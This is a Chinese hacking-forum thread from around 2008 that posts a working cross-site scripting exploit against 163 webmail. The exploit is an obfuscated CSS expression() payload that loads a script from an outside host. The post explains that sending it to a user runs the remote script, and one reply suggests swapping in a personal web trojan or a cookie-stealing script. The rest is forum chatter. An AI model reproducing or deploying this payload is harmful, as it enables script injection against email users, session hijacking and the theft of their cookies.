打印

163邮箱expression漏洞

本主题由 僵尸道长 于 2008-1-2 10:19 移动

163邮箱expression漏洞

<html>
<style>
body {
width:
expression(eval(String.fromCharCode(0x69,0x66,0x28,0x21,0x77,0x69,0x6e,
0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x29,0x7b,0x77,

0x69,0x6e,0x64,0x6f,0x77,0x2e,0x78,0x78,0x78,0x3d,0x31,0x3b,
0x69,0x66,0x28,0x64,0x6f,

0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x29,0x7b,
0x76,0x61,0x72,0x20,0x73,

0x3d,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,
0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,

0x65,0x6d,0x65,0x6e,
0x74,0x28,0x22,0x73,0x63,0x72,0x69,0x70,0x74,0x22,0x29,0x3b,0x64,0x6f,
0x63,

0x75,0x6d,0x65,0x6e,0x74,0x2e,0x62,0x6f,0x64,0x79,0x2e,
0x61,0x70,0x70,0x65,0x6e,0x64,0x43,0x68,0x69,

0x6c,0x64,0x28,0x73,0x29,0x3b,0x73,0x2e,0x73,0x72,0x63,0x3d,
0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x77,

0x77,0x77,0x2e,0x6c,0x65,0x61,0x70,0x61,0x72,0x2e,0x63,0x6f,0x6d,0x2f,
0x31,0x36,0x33,0x78,0x73,0x73,0x2e,

0x6a,0x73,0x22,0x3b,0x7d,0x7d)));
/*if(!window.xxx){window.xxx=1;if(document.body){var
s=document.createElement("script");document.body.appendChild(s);s.src="http://
www.leapar.com/163xss.js";}}*/
}
</style>
<body>
leapar..
163 expression xss..
</body>
</html>

把这个发送给用户,将执行http://www.leapar.com/163xss.js.
鸡翅膀..烤鱼... 口水ing

TOP

建议道长核实下
如果回避只是为自己今后的后悔而找的借口的话,那么我想挣脱掉这个束缚的枷锁——就算遍体鳞伤我也无怨无悔!愛してる,まうぇんりん.ぽくわ大好き!~
清理qq中的长舌妇,以后有什么P话论坛说,qq中扯皮的人一律删除,qq今后不接待一切问候、闲谈等无聊内容。成功为qq瘦身,肩负100人,其中10人拉黑。

TOP

一切源于个性

TOP

src="http:// www.leapar.com/163xss.js";}}*/ }

将这一段可以变成你自己的一个网马或者是盗取COOKIE

TOP


www.leapar.com/163xss.js
还真是存在的...

alert(document.cookie);
附件: 您所在的用户组无法下载或查看附件

TOP

TOP

学习下

TOP


感谢一直以来您对我们的支持!
当前时区 GMT+8, 现在时间是 2008-12-2 00:05 京ICP证060528 号

Designed By 17DST